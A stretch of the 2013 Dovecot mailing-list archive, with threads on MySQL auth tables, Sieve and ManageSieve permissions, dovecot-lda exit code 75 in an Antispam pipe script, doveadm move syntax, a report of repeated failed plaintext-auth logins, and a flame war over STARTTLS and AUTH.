all, Unfortunately, i created my tables according to the older tutorial, i search in dovecot.org and postfix.org but i didn't find any official documentation for tables. I want to use PF 2.10 and dovecot 2. Its tutorial was wrote on debian etch. eatch is very old. ---mohsen From me at junc.eu Thu Jun 20 16:27:24 2013 From: me at junc.eu (Benny Pedersen) Date: Thu, 20 Jun 2013 15:27:24 +0200 Subject: [Dovecot] dovecot enterprise release (benny stop trolling) In-Reply-To: <51C2F872.4070902@thelounge.net> References: <51C02912.8060502@merit.unu.edu> <95a0d741debe504b6ec1ae7a72bfc53d@junc.eu> <51C2D132.6080802@merit.unu.edu> <3de42c15e8eeec30cfe7263a609c6187@junc.eu> <51C2D6D5.6010904@merit.unu.edu> <7423c9950b7deac187962aa26f58bfbe@junc.eu> <51C2F872.4070902@thelounge.net> Message-ID: <2f08d53d3d34c298a6c3202fcdb8d846@junc.eu> Reindl Harald skrev den 2013-06-20 14:41: >> Am 20.06.2013 12:25, schrieb Benny Pedersen: >> is there code changes in dovecot for enterprise ?, does it need a >> patch ? >> do you really belive Timo take his dev time to test on enterprise ? >> its waste of time >> >> Am 20.06.2013 10:54, schrieb Benny Pedersen:> mourik jan SOGo skrev >> den 2013-06-18 11:32: >> apt-get source dovecot -b >> will not work ?, if not then your enterprise is building on >> precompiled problems > > benny stop your foolish trolling and no idea what "enterprise" means > you have little to zero technical knowledge but your mouth wide open > > examples why benny is only a clueless troll? > try to explain the postfix-developer how postfix works is ridiculous > >>> wietse at porcupine.org skrev den 2013-06-15 16:13: >>> The server does not announce or accept AUTH, therefore AUTH it is >>> disabled >> Benny: >> auth does not need starttls, if auth is not anounced then auth is >> disabled > _______________________________________________________ > > http://news.gmane.org/gmane.mail.postfix.user/cutoff=237641 > >> postfix have both auth and starttls, starttls is just for clients to >> use ssl/tls on port 25 > > STARTTLS has *nothing* to with the port > >> email clients will not use starttls in 2013, >> since submission is the right thing anyway > > *foolish idiot* - clients will use STARTTLS *on* submission in 2013 > which is *nothing else* than smptd on Port 587 and usually requires > auth and if you have zero to nothing of a clue *shut up* > >>> wietse at porcupine.org skrev den 2013-06-15 16:13: >>> The server does not announce or accept AUTH, therefore AUTH it is >>> disabled >> auth does not need starttls, if auth is not anounced then auth is >> disabled > > *foolish idiot* with "smtpd_tls_auth_only" it *is not* announced > *until* the TLS handshake between server and client is done -- senders that put my email into body content will deliver it to my own trashcan, so if you like to get reply, dont do it From skdovecot at smail.inf.fh-brs.de Thu Jun 20 16:33:26 2013 From: skdovecot at smail.inf.fh-brs.de (Steffen Kaiser) Date: Thu, 20 Jun 2013 15:33:26 +0200 (CEST) Subject: [Dovecot] Sieve file permission problem In-Reply-To: <25E4BE7C7FD74CAF870820FCE3956BBB@lippai.net> References: <25E4BE7C7FD74CAF870820FCE3956BBB@lippai.net> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Thu, 20 Jun 2013, Zoltan Lippai wrote: > Thanks for the answer, I'm not sure what you mean by the additional permission details. > Here is a quick example: > /var/mail/domainname.hu/zolcsi chmod: 700, owner: vmail:mail > After I set the initial sieve filters, the following file and directory gets created: > /var/mail/domainname.hu/zolcsi/sieve (directory) chmod: 700, owner: vmail:mail > /var/mail/domainname.hu/zolcsi/.dovecot.sieve (symlink to the sieve/sieve.sieve file) chmod: 600, owner: vmail:mail > > After these two are created then the webmail can't modify them unless I delete the files manually. > > Or is it possible to connect via telnet to port 2000 and issue some commands to see the actual answers of the ManageSieve server? Er, below you've wrote that "It uses port 2000 to communicate with dovecot via the ManageSieve plugin." Now you write "webmail can't modify them" ... . So it seems that the webmail is not using port 2000?? If the UI is using the ManageSieve port, all should work fine, once the files are delete and only Pigeonhole (Dovecot Sieve & ManageSieve) accesses the files directly. To test via telnet: perl -e 'use MIME::Base64; print encode_base64(join("\0", @ARGV)), "\n" ' account account 'pwd' $ gnutls-cli -p 2000 --starttls localhost STARTTLS ^D Authenticate "PLAIN" "<>" CAPABILITY HAVESPACE "myscript" 999999 Putscript "foo" {31+} #comment InvalidSieveCommand Putscript "mysievescript" {110+} require ["fileinto", "envelope"]; if envelope :contains "to" "tmartin+sent" { fileinto "INBOX.sent"; } Getscript "mysievescript" Deletescript "mysievescript" setactive "mysievescript" gnutls allows you to use STARTTLS; the number in PutScript's {#+} specifies the number of bytes following the putscript line, that makes up the script, which must be encoded as UTF8. If you know Perl, check out http://search.cpan.org/~ska/Net-ManageSieve-0.12/lib/Net/ManageSieve.pm; or maybe http://search.cpan.org/~mdom/App-Siesh-0.21/bin/siesh "interactive sieve shell" > On 2013. June 19., Wednesday at 18:40, Daniel Parthey wrote: > >> Please provide permission details of the affected directories and files and possibly error messages from dovecot logfile. >> >> Regards >> Daniel >> >> >> >> Zoltan Lippai schrieb: >>> Hi folks, >>> >>> I am using dovecot 2.1.7 with the ManageSieve plugin which works great. Recently I set up Afterlogic webmail on my server (the community version) and it has a nice UI to manage the sieve settings. It uses port 2000 to communicate with dovecot via the ManageSieve plugin. Also, dovecot uses Maildirs to store the messages. >>> >>> The problem is that the permissions on the files that store the sieve rules are to strict. >>> I am talking about the "sieve" directory and the .dovecot.sieve file. >>> The sieve folder has a chmod 700 and the .dovecot.sieve is chmod 600. Both are owned by vmail:mail >>> >>> If I delete these two items, then the rules can be saved via the web interface. Then these files are created but for some reason the ManageSieve plugin can't modify them. >>> >>> Here is the output of dovecot -n: >>> http://pastebin.com/4eqyBKCA >>> >>> Can you help me out on this? >>> >>> Thanks a lot! >>> Zoltan >>> >>> > > - -- Steffen Kaiser -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) iQEVAwUBUcMEpl3r2wJMiz2NAQKOpgf+I5WOAWs8+ruXJYen/HhUQK4d6biY9psq PjKmLdKXD/MBvOpXqKpB9E3dbWQXoYuZeU6nqLFOgJVGbgmbvq4Dpj4/CQod3dMy wLFECXRDkW8rTVetaC2gLlJN/U/wVlV7nQ3CjtseZZQ+MTBAP+iYcyv0AKYNXafH BWpUYG1eVPIsCV+GFXjKP0+MkCgHyYpnvySNAIYafV/3+9ETFrC3w7Oa7VsEXJtg Pm+JEMtkgCxJDHSLamiirrLdL93IZwfeT+AHJ2eQSu0GskPStjjUv/RAu+F7suCM 1PQ7t790L7BY5SDe7LXWzGP+Gz6TC3ZU/FLxB6kcBCy9aCIWMuozXg== =SLh7 -----END PGP SIGNATURE----- From h.reindl at thelounge.net Thu Jun 20 16:54:15 2013 From: h.reindl at thelounge.net (Reindl Harald) Date: Thu, 20 Jun 2013 15:54:15 +0200 Subject: [Dovecot] dovecot enterprise release (benny stop trolling) In-Reply-To: <2f08d53d3d34c298a6c3202fcdb8d846@junc.eu> References: <51C02912.8060502@merit.unu.edu> <95a0d741debe504b6ec1ae7a72bfc53d@junc.eu> <51C2D132.6080802@merit.unu.edu> <3de42c15e8eeec30cfe7263a609c6187@junc.eu> <51C2D6D5.6010904@merit.unu.edu> <7423c9950b7deac187962aa26f58bfbe@junc.eu> <51C2F872.4070902@thelounge.net> <2f08d53d3d34c298a6c3202fcdb8d846@junc.eu> Message-ID: <51C30987.30600@thelounge.net> and why do you troll see the need to mail Wietse what he already knows? people like *you* are the reason why others get moderated or blocked because they can no longer hear bullshit-answers http://news.gmane.org/gmane.mail.postfix.user/cutoff=237641 >> Benny Pedersen: >> auth does not need starttls, if auth is not anounced then auth is >> disabled > > AUTH requires STARTTLS with smtpd_tls_auth_only=yes. > > In view of your contributions in recent threads, you are one > step away from removal from this mailing list Am 20.06.2013 15:27, schrieb Benny Pedersen: > Reindl Harald skrev den 2013-06-20 14:41: >>> Am 20.06.2013 12:25, schrieb Benny Pedersen: >>> is there code changes in dovecot for enterprise ?, does it need a patch ? >>> do you really belive Timo take his dev time to test on enterprise ? >>> its waste of time >>> >>> Am 20.06.2013 10:54, schrieb Benny Pedersen:> mourik jan SOGo skrev den 2013-06-18 11:32: >>> apt-get source dovecot -b >>> will not work ?, if not then your enterprise is building on precompiled problems >> >> benny stop your foolish trolling and no idea what "enterprise" means >> you have little to zero technical knowledge but your mouth wide open >> >> examples why benny is only a clueless troll? >> try to explain the postfix-developer how postfix works is ridiculous >> >>>> wietse at porcupine.org skrev den 2013-06-15 16:13: >>>> The server does not announce or accept AUTH, therefore AUTH it is disabled >>> Benny: >>> auth does not need starttls, if auth is not anounced then auth is disabled >> _______________________________________________________ >> >> http://news.gmane.org/gmane.mail.postfix.user/cutoff=237641 >> >>> postfix have both auth and starttls, starttls is just for clients to >>> use ssl/tls on port 25 >> >> STARTTLS has *nothing* to with the port >> >>> email clients will not use starttls in 2013, >>> since submission is the right thing anyway >> >> *foolish idiot* - clients will use STARTTLS *on* submission in 2013 >> which is *nothing else* than smptd on Port 587 and usually requires >> auth and if you have zero to nothing of a clue *shut up* >> >>>> wietse at porcupine.org skrev den 2013-06-15 16:13: >>>> The server does not announce or accept AUTH, therefore AUTH it is disabled >>> auth does not need starttls, if auth is not anounced then auth is disabled >> >> *foolish idiot* with "smtpd_tls_auth_only" it *is not* announced >> *until* the TLS handshake between server and client is done -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 263 bytes Desc: OpenPGP digital signature URL: From ben at indietorrent.org Thu Jun 20 17:01:33 2013 From: ben at indietorrent.org (Ben Johnson) Date: Thu, 20 Jun 2013 10:01:33 -0400 Subject: [Dovecot] Calling dovecot-lda from within Antispam pipe script (bash) seems to have no effect In-Reply-To: <1371701672.2588.50.camel@worklian> References: <51C1FDFE.8010506@indietorrent.org> <1371701672.2588.50.camel@worklian> Message-ID: <51C30B3D.3070109@indietorrent.org> On 6/20/2013 12:14 AM, Bob Miller wrote: > Hi Ben, > > I checked over your script, and I don't see the problem either. You > already checked everything that comes to my mind. > > Maybe using something like set -e to try and get some output from the > script? > Adding the -e switch doesn't seem to produce any output, either. But I did think to try echo-ing $? after calling dovecot-lda, which dumps the program's exit status code. The code is 75, which, according to the manual at http://wiki.dovecot.org/LDA , means the following: 75 (EX_TEMPFAIL): A temporary failure. This is returned for almost all failures. See the log file for details. Well, I checked the log files and there's absolutely nothing written when my script is executed and yields exit code 75. (But other failures are indeed written to the same log file, such as when the message can't be delivered due to over-quota.) As noted earlier in my doveconf -n output, I added explicit log paths for LDA: protocol lda { mail_plugins = sieve quota log_path = /var/log/dovecot-lda-errors.log info_log_path = /var/log/dovecot-lda.log } These are the logs that I am checking, which are devoid of messages relating to this script. Also, nothing is written to /var/log/mail.log. The only logging that I am able to discern is to /var/log/syslog: Jun 20 09:59:33 host imap: antispam: mailbox_is_unsure(Junk): 0 Jun 20 09:59:33 host imap: antispam: mailbox_is_trash(INBOX): 0 Jun 20 09:59:33 host imap: antispam: mailbox_is_trash(Junk): 0 Jun 20 09:59:33 host imap: antispam: mail copy: from trash: 0, to trash: 0 Jun 20 09:59:33 host imap: antispam: mailbox_is_spam(INBOX): 0 Jun 20 09:59:33 host imap: antispam: mailbox_is_spam(Junk): 1 Jun 20 09:59:33 host imap: antispam: mailbox_is_unsure(INBOX): 0 Jun 20 09:59:33 host imap: antispam: mail copy: src spam: 0, dst spam: 1, src unsure: 0 Jun 20 09:59:33 host imap: antispam: running mailtrain backend program /usr/bin/sa-learn-pipe.sh Jun 20 09:59:33 host imap: antispam: running mailtrain backend program /usr/bin/sa-learn-pipe.sh Jun 20 09:59:33 host imap: antispam: running mailtrain backend program parameter 1 --debug Jun 20 09:59:33 host imap: antispam: running mailtrain backend program parameter 2 --username=amavis Jun 20 09:59:33 host imap: antispam: running mailtrain backend program parameter 3 --spam I'm not sure what to try next... Thanks for the help, -Ben From tlx at leuxner.net Thu Jun 20 17:12:25 2013 From: tlx at leuxner.net (Thomas Leuxner) Date: Thu, 20 Jun 2013 16:12:25 +0200 Subject: [Dovecot] HowTo / VirtualUserFlatFilesPostfix In-Reply-To: <1371724314962-42887.post@n4.nabble.com> References: <1371724314962-42887.post@n4.nabble.com> Message-ID: <20130620141225.GA622@nihlus.leuxner.net> * treanorv 2013.06.20 12:31: > The following is an excerpt from the HOWTO mentioned > > Per-domain authentication and configuration structure /var/vmail > dr-x------ 3 doveauth dovecot 4096 2010-03-17 19:09 auth.d |--> domain.tld It is meant as a hint/illustration rather than actual output of 'ls'. In this configuration example the domain specific part will reside under the 'auth.d' dir - the actual passwd-file will be in the 'domain.tld' directory below 'auth.d'. Regards Thomas -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 198 bytes Desc: Digital signature URL: From jerry at seibercom.net Thu Jun 20 17:34:41 2013 From: jerry at seibercom.net (Jerry) Date: Thu, 20 Jun 2013 10:34:41 -0400 Subject: [Dovecot] dovecot enterprise release (benny stop trolling) In-Reply-To: <51C30987.30600@thelounge.net> References: <51C02912.8060502@merit.unu.edu> <95a0d741debe504b6ec1ae7a72bfc53d@junc.eu> <51C2D132.6080802@merit.unu.edu> <3de42c15e8eeec30cfe7263a609c6187@junc.eu> <51C2D6D5.6010904@merit.unu.edu> <7423c9950b7deac187962aa26f58bfbe@junc.eu> <51C2F872.4070902@thelounge.net> <2f08d53d3d34c298a6c3202fcdb8d846@junc.eu> <51C30987.30600@thelounge.net> Message-ID: <20130620103441.7fe4d51f@scorpio> On Thu, 20 Jun 2013 15:54:15 +0200 Reindl Harald articulated: > and why do you troll see the need to mail Wietse what he already > knows? people like *you* are the reason why others get moderated or > blocked because they can no longer hear bullshit-answers Wrong! Most people get bounced because they either "feed the trolls", continually propagate misinformation under the guise of fact or continue to argue a point after they have been proven wrong. -- Jerry ? Disclaimer: off-list followups get on-list replies or get ignored. Please do not ignore the Reply-To header. __________________________________________________________________ From h.reindl at thelounge.net Thu Jun 20 17:37:35 2013 From: h.reindl at thelounge.net (Reindl Harald) Date: Thu, 20 Jun 2013 16:37:35 +0200 Subject: [Dovecot] dovecot enterprise release (benny stop trolling) In-Reply-To: <20130620103441.7fe4d51f@scorpio> References: <51C02912.8060502@merit.unu.edu> <95a0d741debe504b6ec1ae7a72bfc53d@junc.eu> <51C2D132.6080802@merit.unu.edu> <3de42c15e8eeec30cfe7263a609c6187@junc.eu> <51C2D6D5.6010904@merit.unu.edu> <7423c9950b7deac187962aa26f58bfbe@junc.eu> <51C2F872.4070902@thelounge.net> <2f08d53d3d34c298a6c3202fcdb8d846@junc.eu> <51C30987.30600@thelounge.net> <20130620103441.7fe4d51f@scorpio> Message-ID: <51C313AF.1070300@thelounge.net> Am 20.06.2013 16:34, schrieb Jerry: > On Thu, 20 Jun 2013 15:54:15 +0200 > Reindl Harald articulated: > >> and why do you troll see the need to mail Wietse what he already >> knows? people like *you* are the reason why others get moderated or >> blocked because they can no longer hear bullshit-answers > > Wrong! Most people get bounced because they either "feed the trolls", > continually propagate misinformation under the guise of fact or > continue to argue a point after they have been proven wrong *not* wrong i got not only one time bounced because i did no longer find any nice word for idiots which argue a point after they have been proven wrong instead the foolish trolls like the one i answered here -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 263 bytes Desc: OpenPGP digital signature URL: From treanorv at gmail.com Thu Jun 20 18:00:22 2013 From: treanorv at gmail.com (treanorv) Date: Thu, 20 Jun 2013 08:00:22 -0700 (PDT) Subject: [Dovecot] HowTo / VirtualUserFlatFilesPostfix In-Reply-To: <20130620141225.GA622@nihlus.leuxner.net> References: <1371724314962-42887.post@n4.nabble.com> <20130620141225.GA622@nihlus.leuxner.net> Message-ID: Thomas, I understand, thank you. When is a comment not a comment and visa versa ? Regards, treanorv On Thu, Jun 20, 2013 at 3:13 PM, Thomas Leuxner [via Dovecot] < ml-node+s2317879n42894h88 at n4.nabble.com> wrote: > * treanorv <[hidden email]> > 2013.06.20 12:31: > > > The following is an excerpt from the HOWTO mentioned > > > > Per-domain authentication and configuration structure /var/vmail > > dr-x------ 3 doveauth dovecot 4096 2010-03-17 19:09 auth.d |--> > domain.tld > > It is meant as a hint/illustration rather than actual output of 'ls'. In > this configuration example the domain specific part will reside under the > 'auth.d' dir - the actual passwd-file will be in the 'domain.tld' directory > below 'auth.d'. > > Regards > Thomas > > *signature.asc* (205 bytes) Download Attachment > > > ------------------------------ > If you reply to this email, your message will be added to the discussion > below: > > http://dovecot.2317879.n4.nabble.com/HowTo-VirtualUserFlatFilesPostfix-tp42887p42894.html > To unsubscribe from HowTo / VirtualUserFlatFilesPostfix, click here > . > NAML > -- View this message in context: http://dovecot.2317879.n4.nabble.com/HowTo-VirtualUserFlatFilesPostfix-tp42887p42897.html Sent from the Dovecot mailing list archive at Nabble.com. From ben at indietorrent.org Thu Jun 20 19:33:25 2013 From: ben at indietorrent.org (Ben Johnson) Date: Thu, 20 Jun 2013 12:33:25 -0400 Subject: [Dovecot] Calling dovecot-lda from within Antispam pipe script (bash) seems to have no effect In-Reply-To: <51C30B3D.3070109@indietorrent.org> References: <51C1FDFE.8010506@indietorrent.org> <1371701672.2588.50.camel@worklian> <51C30B3D.3070109@indietorrent.org> Message-ID: <51C32ED5.2090709@indietorrent.org> It really boils-down to the fact that I can call the following on the command-line and it functions as expected: su vmail -c '/usr/lib/dovecot/deliver -a "sa-training at example.com" -d "sa-training at example.com" -m "Training.SPAM" -p "/tmp/sendmail-msg-25794.txt"' Yet, when I attempt to do the exact same thing from within the pipe script that Dovecot Antispam calls, I receive exit code 75 from deliver/dovecot-lda and absolutely nothing is logged, with exception of the information of which I'm already aware (logged to syslog). I am echo-ing $(whoami) just before calling "deliver" within the pipe script and the output is "vmail". So, it's not as though the vmail user somehow lacks the permissions required to send via dovecot-lda. What is the explanation for this behavior? It has to be something to do with how the plug-in calls the script. Does the plug-in call the script in some other context, like chroot? As a final point of note, is it just me, or is the "90-plugin.conf" snippet incorrect at the bottom of http://wiki2.dovecot.org/Plugins/Antispam ? Those values appear to be for the analogous Dovecot 1 plug-in, e.g., "antispam_mail_sendmail" is used, when the equivalent directive is called "antispam_pipe_program" in versions >= 2.0. -Ben From dovecot at vosslamber.nl Thu Jun 20 22:49:58 2013 From: dovecot at vosslamber.nl (Luuk@dovecot) Date: Thu, 20 Jun 2013 21:49:58 +0200 Subject: [Dovecot] MySQL tables and official documenttation In-Reply-To: <1371733477.25411.17.camel@debian> References: <1371733477.25411.17.camel@debian> Message-ID: <51C35CE6.7080808@vosslamber.nl> On 20-06-2013 15:04, Mohsen Pahlevanzadeh wrote: > Dear all, > > Unfortunately, i created my tables according to the older tutorial, i > search in dovecot.org and postfix.org but i didn't find any official > documentation for tables. Because Dovecot wiki says: "Dovecot supports user authentication against a MySQL-database." (http://wiki2.dovecot.org/FeatAuthMysql) my guest would be that you are trying to find the definitions which are given here: http://wiki2.dovecot.org/AuthDatabase/SQL > I want to use PF 2.10 and dovecot 2. i'm sorry, but i dont know what 'PF 2.10' is.... (but that could be my problem ;) > Its tutorial was wrote on debian etch. eatch is very old. > > > ---mohsen > From thomas-lists at nybeta.com Thu Jun 20 23:37:29 2013 From: thomas-lists at nybeta.com (Thomas Harold) Date: Thu, 20 Jun 2013 16:37:29 -0400 Subject: [Dovecot] MySQL tables and official documenttation In-Reply-To: <1371733477.25411.17.camel@debian> References: <1371733477.25411.17.camel@debian> Message-ID: <51C36809.50508@nybeta.com> On 6/20/2013 9:04 AM, Mohsen Pahlevanzadeh wrote: > Dear all, > > Unfortunately, i created my tables according to the older tutorial, i > search in dovecot.org and postfix.org but i didn't find any official > documentation for tables. > I want to use PF 2.10 and dovecot 2. > Its tutorial was wrote on debian etch. eatch is very old. You'll want to look at the following website for postfixadmin stuff: http://sourceforge.net/projects/postfixadmin/ http://postfixadmin.sourceforge.net/ Roughly, the install process is: 1. Create a database user in mysql and create the database 2. Install the postfixadmin tgz contents somewhere under /var/www 3. Fire up your webbrowser and point it at the postfixadmin setup.php URL If you follow the install directions, the postfixadmin page will create your database for you. After which you can start populating the database with domains, mailboxes and aliases. (Installing RoundCube is a similar process.) From thomas-lists at nybeta.com Thu Jun 20 23:55:30 2013 From: thomas-lists at nybeta.com (Thomas Harold) Date: Thu, 20 Jun 2013 16:55:30 -0400 Subject: [Dovecot] doveadm move syntax In-Reply-To: References: Message-ID: <51C36C42.4050109@nybeta.com> On 6/19/2013 10:25 PM, vincent truc wrote: > Hello > > I want to forward an email to user1 at domain.com box to the box user2 at domain.com > > For this I try to use 'doveadm move', but I'm having problems with the syntax. > > Could you give me an example please? > Assuming that you looked at "man doveadm-move" (I had to dig for a few minutes to uncover that)... EXAMPLE Move jane's messages - received in September 2011 - from her INBOX into her archive. doveadm move -u jane Archive/2011/09 mailbox INBOX BEFORE \ 2011-10-01 SINCE 01-Sep-2011 At a guess... "Archive/2011/09" can be either a path relative to the origin user, or an absolute destination such as: maildir:/backup/20101126/jane.doe/Maildir I don't know if it automatically handles putting the proper permissions on the destination files though. I'm basing that guess on the examples at the bottom of "man doveadm-import". From jtam.home at gmail.com Fri Jun 21 00:58:47 2013 From: jtam.home at gmail.com (Joseph Tam) Date: Thu, 20 Jun 2013 14:58:47 -0700 (PDT) Subject: [Dovecot] Calling dovecot-lda from within Antispam pipe script (bash) seems to have no effect In-Reply-To: References: Message-ID: Ben Johnson writes: > It really boils-down to the fact that I can call the following on the > command-line and it functions as expected: > > su vmail -c '/usr/lib/dovecot/deliver -a "sa-training at example.com" -d > "sa-training at example.com" -m "Training.SPAM" -p > "/tmp/sendmail-msg-25794.txt"' > > Yet, when I attempt to do the exact same thing from within the pipe > script that Dovecot Antispam calls, I receive exit code 75 from > deliver/dovecot-lda and absolutely nothing is logged, with exception of > the information of which I'm already aware (logged to syslog). Have you also checked the environment variables? I think dovecot-lda gets some information from them. Also, it's possible the PATH or some other critical environment variables is different, causing the difference in outcome. Joseph Tam From hugh at davenport.net.nz Fri Jun 21 01:05:00 2013 From: hugh at davenport.net.nz (Hugh Davenport) Date: Fri, 21 Jun 2013 10:05:00 +1200 Subject: [Dovecot] =?utf-8?q?Would_attempting_plaintext_auth_repeatably_ca?= =?utf-8?q?use_a_DOS_and_server_to_crash=3F?= Message-ID: <3c385a12fd527a79cc37595ccfb83d8a@davenport.net.nz> Hey All, I'm just wondering whether this is what caused my server to crash. Started last night in NZ land. Jun 20 19:22:11 elm dovecot: imap-login: Disconnected (tried to use disallowed plaintext auth): user=<>, rip=attackerip, lip=10.0.0.3, session=<0C8LzpDfZQDINsQC> occasionally get Jun 20 19:22:52 elm dovecot: imap-login: Disconnected (no auth attempts in 1 secs): user=<>, rip=attackerip, lip=10.0.0.3, session= or in 0 secs last at Jun 20 19:26:24 elm dovecot: imap-login: Disconnected (tried to use disallowed plaintext auth): user=<>, rip=attackerip, lip=10.0.0.3, session=<1MUR3ZDfcwDINsQC> and a minute later the server lost contact to the world. When I checked a bit later, the underlying host machine (dovecot runs on a VM (KVM)) had been powered off. Now, here in NZ land, there was also a crazy storm last night, and lots of brown outs. There could potentially of been a surge that killed it, but the UPS was still running fine when I started it again. The "attack" lasted around 4 minutes, in which there was 1161 lines in the log for a single attacker ip, and no other similar logs previously. Would this be enough to kill not only the VM running dovecot, but the underlying host machine? All up to date with patches, running debian stable (wheezy). dovecot-core debian package version 1:2.1.7-7 dovecot version 2.1.7 I notice there is a version 2.2.3 out, but not in debian yet. Could this fix this issue? I don't particularly want to have it happen again :D. Any thoughts? Cheers, Hugh From bob at computerisms.ca Fri Jun 21 05:00:23 2013 From: bob at computerisms.ca (Bob Miller) Date: Thu, 20 Jun 2013 19:00:23 -0700 Subject: [Dovecot] Calling dovecot-lda from within Antispam pipe script (bash) seems to have no effect In-Reply-To: <51C32ED5.2090709@indietorrent.org> References: <51C1FDFE.8010506@indietorrent.org> <1371701672.2588.50.camel@worklian> <51C30B3D.3070109@indietorrent.org> <51C32ED5.2090709@indietorrent.org> Message-ID: <1371780023.2588.175.camel@worklian> Hi Ben, >> Maybe using something like set -e to try and get some output from the >> script? >> >Adding the -e switch doesn't seem to produce any output, either. To be clear, I meant putting the line: set -e near the top of your script. I forget exactly how it functions, but it makes it so when a script fails it spits out a why on stdout (or maybe stderr). I believe the -x argument does something useful for troubleshooting too, but it's been too long. `man bash` knows all... > It really boils-down to the fact that I can call the following on the > command-line and it functions as expected: > > su vmail -c '/usr/lib/dovecot/deliver -a "sa-training at example.com" -d > "sa-training at example.com" -m "Training.SPAM" -p > "/tmp/sendmail-msg-25794.txt"' > > Yet, when I attempt to do the exact same thing from within the pipe > script that Dovecot Antispam calls, I receive exit code 75 from > deliver/dovecot-lda and absolutely nothing is logged, with exception of > the information of which I'm already aware (logged to syslog). > > I am echo-ing $(whoami) just before calling "deliver" within the pipe > script and the output is "vmail". So, it's not as though the vmail user > somehow lacks the permissions required to send via dovecot-lda. There are two things that came to mind when I read your mail yesterday. They are the first things I check for when my commands work and my scripts don't. The first is $PATH, I have found innumerable times when a script wouldn't run it was because it wasn't running with a fully loaded $PATH variable, and this is especially true if you are launching your script from cron. To work around this I either put a PATH= at the top of the script, or I run the script as an argument to bash instead of using the executable bit (ie `bash /path/to/script.sh` instead of `./script.sh`) so the path is retained from the shell. I decided against mentioning this yesterday because I noted you only used full paths in your script, which should also work to avoid this problem. The other thing I didn't mention was the permissions on the path to /usr/lib/dovecot/deliver (or any other path, really). Directories with no world read/execute can prevent scripts from using files beneath them if they don't have permissions on each directory level in the path. I didn't mention this yesterday because you said you ran the script as vmail. However, looking at your "su vmail -c" command, I remember some times when "su postrgres -c" didn't work when "su - postrgres" then running the command did. Probably neither of these will be useful to you, but I mention them in hope that they trigger and idea or set you on an investigative path that proves helpful... > > What is the explanation for this behavior? It has to be something to do > with how the plug-in calls the script. Does the plug-in call the script > in some other context, like chroot? > > As a final point of note, is it just me, or is the "90-plugin.conf" > snippet incorrect at the bottom of > http://wiki2.dovecot.org/Plugins/Antispam ? Those values appear to be > for the analogous Dovecot 1 plug-in, e.g., "antispam_mail_sendmail" is > used, when the equivalent directive is called "antispam_pipe_program" in > versions >= 2.0. > > -Ben From bob at computerisms.ca Fri Jun 21 05:08:13 2013 From: bob at computerisms.ca (Bob Miller) Date: Thu, 20 Jun 2013 19:08:13 -0700 Subject: [Dovecot] Calling dovecot-lda from within Antispam pipe script (bash) seems to have no effect In-Reply-To: <1371780023.2588.175.camel@worklian> References: <51C1FDFE.8010506@indietorrent.org> <1371701672.2588.50.camel@worklian> <51C30B3D.3070109@indietorrent.org> <51C32ED5.2090709@indietorrent.org> <1371780023.2588.175.camel@worklian> Message-ID: <1371780493.2588.177.camel@worklian> I got another quick idea, too; try running dovecot in the foreground. Maybe something that isn't being written to the log will show up on the terminal... -- Computerisms Bob Miller 867-334-7117 / 867-633-3760 http://computerisms.ca On Thu, 2013-06-20 at 19:00 -0700, Bob Miller wrote: > Hi Ben, > > > >> Maybe using something like set -e to try and get some output from the > >> script? > >> > > >Adding the -e switch doesn't seem to produce any output, either. > > To be clear, I meant putting the line: > > set -e > > near the top of your script. I forget exactly how it functions, but it > makes it so when a script fails it spits out a why on stdout (or maybe > stderr). I believe the -x argument does something useful for > troubleshooting too, but it's been too long. `man bash` knows all... > > > > It really boils-down to the fact that I can call the following on the > > command-line and it functions as expected: > > > > su vmail -c '/usr/lib/dovecot/deliver -a "sa-training at example.com" -d > > "sa-training at example.com" -m "Training.SPAM" -p > > "/tmp/sendmail-msg-25794.txt"' > > > > Yet, when I attempt to do the exact same thing from within the pipe > > script that Dovecot Antispam calls, I receive exit code 75 from > > deliver/dovecot-lda and absolutely nothing is logged, with exception of > > the information of which I'm already aware (logged to syslog). > > > > I am echo-ing $(whoami) just before calling "deliver" within the pipe > > script and the output is "vmail". So, it's not as though the vmail user > > somehow lacks the permissions required to send via dovecot-lda. > > There are two things that came to mind when I read your mail yesterday. > They are the first things I check for when my commands work and my > scripts don't. > > The first is $PATH, I have found innumerable times when a script > wouldn't run it was because it wasn't running with a fully loaded $PATH > variable, and this is especially true if you are launching your script > from cron. To work around this I either put a PATH= at the top of the > script, or I run the script as an argument to bash instead of using the > executable bit (ie `bash /path/to/script.sh` instead of `./script.sh`) > so the path is retained from the shell. I decided against mentioning > this yesterday because I noted you only used full paths in your script, > which should also work to avoid this problem. > > The other thing I didn't mention was the permissions on the path > to /usr/lib/dovecot/deliver (or any other path, really). Directories > with no world read/execute can prevent scripts from using files beneath > them if they don't have permissions on each directory level in the path. > I didn't mention this yesterday because you said you ran the script as > vmail. However, looking at your "su vmail -c" command, I remember some > times when "su postrgres -c" didn't work when "su - postrgres" then > running the command did. > > Probably neither of these will be useful to you, but I mention them in > hope that they trigger and idea or set you on an investigative path that > proves helpful... > > > > > > What is the explanation for this behavior? It has to be something to do > > with how the plug-in calls the script. Does the plug-in call the script > > in some other context, like chroot? > > > > As a final point of note, is it just me, or is the "90-plugin.conf" > > snippet incorrect at the bottom of > > http://wiki2.dovecot.org/Plugins/Antispam ? Those values appear to be > > for the analogous Dovecot 1 plug-in, e.g., "antispam_mail_sendmail" is > > used, when the equivalent directive is called "antispam_pipe_program" in > > versions >= 2.0. > > > > -Ben > From kamath at moltingpenguin.com Fri Jun 21 09:18:39 2013 From: kamath at moltingpenguin.com (Sean Kamath) Date: Thu, 20 Jun 2013 23:18:39 -0700 Subject: [Dovecot] Allowing clients to test their Sieve scripts In-Reply-To: References: <4E0089EE-35D3-411C-8A41-8F5A2BD683FD@froglogic.com> Message-ID: <62C7A927-28DC-4A38-BED3-A18FA254F820@moltingpenguin.com> On Jun 19, 2013, at 1:00 AM, Steffen Kaiser wrote: > On Fri, 14 Jun 2013, Frerich Raabe wrote: >> I then usually just run the sieve-test binary (part of the Pigeonhole distribution) and send them the output. However, I was wondering - is there maybe a way for them to try it themselves? Like, maybe a tiny web server which just prints a form asking for a mail file and a sieve script, and then it runs sieve-script and prints the output of that? I wonder how other people do that. > > you are not referring to syntax errors, do you? > > Otherwise, 